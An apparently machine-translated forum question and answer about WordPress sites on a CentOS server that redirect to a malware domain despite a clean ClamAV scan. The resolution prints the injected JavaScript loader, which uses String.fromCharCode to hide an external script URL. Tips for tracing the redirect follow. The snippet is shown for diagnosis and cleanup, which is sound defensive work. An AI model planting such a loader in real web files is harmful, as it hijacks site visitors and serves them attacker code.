我正在做我最糟糕的噩梦。我有一个CentOS服务器,它托管了10个WordPress网站。
我的客户注意到他们的网站正在打开,加载后会重定向到(fast.destinyfernandi.com(<----恶意软件网站。
我使用ClamAV检测恶意软件并手动清除它们,但没有成功。
以下是其中一个网站的Clamscan命令结果示例:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
但该网站仍在重定向到该恶意软件网站。
有人遇到过这样的问题吗?
请帮忙。
====================================已解决:=======================
代码被注入所有js文件
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
有几种方法可以将web资源重定向到destinatyfernandi。
- 数据库可以进行修补,您自己的ligitimate代码也可以重定向
- php、JS或html模板中的一些注入代码通过window.location或响应的meta或标头重定向
首先发现重定向到的地址,无论是destinatyfernandi还是其他URL。我的意思是,你可能会被重定向到一些"不可见"的URL1,而为URL1服务的服务器会将浏览器进一步重定向到destinatyfernandi。
一旦发现重定向中的第一个跃点(URL(,就可以在源代码和数据库转储中搜索错误的URL。
第一跳URL(很可能是destinfernandi(也有可能在代码中被混淆,但希望不是这样。
你还可以添加断点,它可以在重定向上触发,这可以帮助你识别混淆的JS代码:
window.addEventListener("beforeunload", function() { debugger; }, false)